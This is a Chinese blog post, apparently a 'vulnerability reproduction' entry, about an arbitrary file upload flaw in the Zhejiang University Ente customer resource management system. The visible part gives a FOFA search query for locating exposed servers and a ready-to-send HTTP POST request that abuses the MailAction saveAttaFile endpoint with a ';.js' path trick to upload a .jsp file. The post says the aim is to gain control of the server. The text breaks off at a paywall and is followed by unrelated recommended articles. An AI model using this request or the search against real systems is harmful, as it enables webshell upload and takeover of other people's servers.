浙大恩特CRMMailAction 接口存在任意文件上传(含批量验证poc)

已于 2024-04-09 21:45:44 修改
阅读量16 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-09 21:45:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137568899
版权

产品简介
杭州恩软信息技术有限公司(浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件,是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司。
漏洞描述
浙大恩特客户资源管理系统存在文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。
fofa
title=”欢迎使用浙大恩特客户资源管理系统”
漏洞复现

POST /entsoft/MailAction.entphone;.js?act=saveAttaFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryec63jznAR8GkjqFn
Content-Length: 181

------WebKitFormBoundaryec63jznAR8GkjqFn
Content-Disposition: form-data; name="file"; filename="nnd.jsp"
Conte
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
CRM前台任意文件漏洞(批量验证poc
weixin_43567873的博客
04-09 82
CRM前台任意文件漏洞(批量验证poc
CRMfileupload.jsp任意文件批量验证poc
weixin_43567873的博客
04-07 47
CRMfileupload.jsp任意文件批量验证poc
客户资源管理系统-MailAction-AppUpload-任意文件批量验证poc
weixin_43567873的博客
03-29 179
客户资源管理系统-MailAction-AppUpload-任意文件
CRM-machord_doc.jsp任意文件批量验证poc
weixin_43567873的博客
04-07 62
CRM-machord_doc.jsp任意文件批量验证poc
软件操作流程样本.doc
12-18
软件操作流程样本.doc 软件操作流程样本是一种外贸软件顾客手册,旨在指导用户快速掌握软件的操作流程。下面是根据软件操作流程样本.doc生成的相关知识点: 一、登入系统 * 软件的登入系统是...
软件企业市场营销策略研究—以网络科技有限公司为例.doc
11-25
本文以网络科技有限公司为例,深入探讨了针对软件产品有的营销策略。软件业作为我国信息产业的重要支柱,其影响力在国民经济各个领域不断扩大,对经济增长的推动作用日益显著。 软件产品的性决定了其...
软件操作流程.doc
04-25
根据提供的文件信息,我们可以归纳出以下相关知识点: ### 软件操作流程知识点解析 #### 一、快速管理入门 在《外贸软件用户手册》中,快速管理入门部分主要介绍了如何快速上手该软件进行基础管理...
雷加
02-21
"雷加"可能是指一个与C++编程相关的项目或软件工程的交付物。由于提供的信息有限,我将基于“C++”这一标签来详细阐述C++编程语言的相关知识点。 C++是一种强大的、面向对象的编程语言,由Bjarne Stroustrup于...
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
qq_25467441的博客
07-24 417
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及统的安全检测技术,基于行为征检测,识别网络中输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 984
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 507
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
标题:微软蓝屏事件:网络安全的警钟与反思
chezabo6116的博客
07-23 559
标题:微软蓝屏事件:网络安全的警钟与反思 近日,微软视窗系统软件更新引发的“微软蓝屏”事件,不仅在全球范围内引发了广泛关注,也对全球IT基础设施的韧性与安全性提出了严峻挑战。这次事件暴露了网络安全和系统稳定性方面的诸多问题。本文将从软件更新流程中的风险管理、预防大规模故障的最佳方案、以及跨领域连锁反应的行业影响三个方面,探讨如何构建更加稳固和安全的网络环境。 方向一:软件更新流程中的风险管理和质量控制机制 软件更新是系统维护的重要环节,但不当的更新流程可能会引入新的风险。此次“微软蓝屏”事件就是一个典型案例
“微软蓝屏“事件暴露了网络安全哪些问题?
程序员-张师傅
07-23 746
微软蓝屏事件,尤其是2024年7月19日发生的全球性Windows系统崩溃事件,带来了多方面的深刻教训。
“微软蓝屏”事件暴露了网络安全哪些问题
最新发布
骑上单车去旅行的博客
07-24 856
通过不同领域的技术融合,原有行业的统模式和业务模型得到改变,进而引发行业的升级和转型。例如,互联网技术的发展和应用,对统行业如零售、金融等产生了巨大的冲击,推动了行业的数字化、智能化和创新转型。总之,跨领域连锁反应对行业的影响是多方面的,它能够促进行业之间的合作与融合,推动行业的升级和转型,促进行业的跨界创新,提升行业的全球竞争力。通过及时的监控和反馈,可以快速发现并解决潜在的问题,提高软件的质量和稳定性。通过与其他领域的跨界合作和创新,行业能够更好地补充和整合资源,提升自身的创新能力和竞争力。
便宜多域名SSL证书申请平台推荐
osfipin note
07-23 844
随着互联网的深入发展,网络安全问题愈发受到重视。SSL证书作为保障网站和用户数据安全的重要工具,其重要性不言而喻。在众多SSL证书类型中,多域名SSL证书因其独的功能和优势,逐渐成为企业和个人保护网站安全的首选。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
轻舟已过万重山
07-23 301
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
外贸客户管理系统操作指南
"外贸客户管理系统使用手册" 外贸客户管理系统是一款专为外贸企业设计的高效管理工具,旨在帮助企业管理客户信息、跟进进度、销售计划以及日常运营。本手册详细介绍了系统的安装、使用和各项功能的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值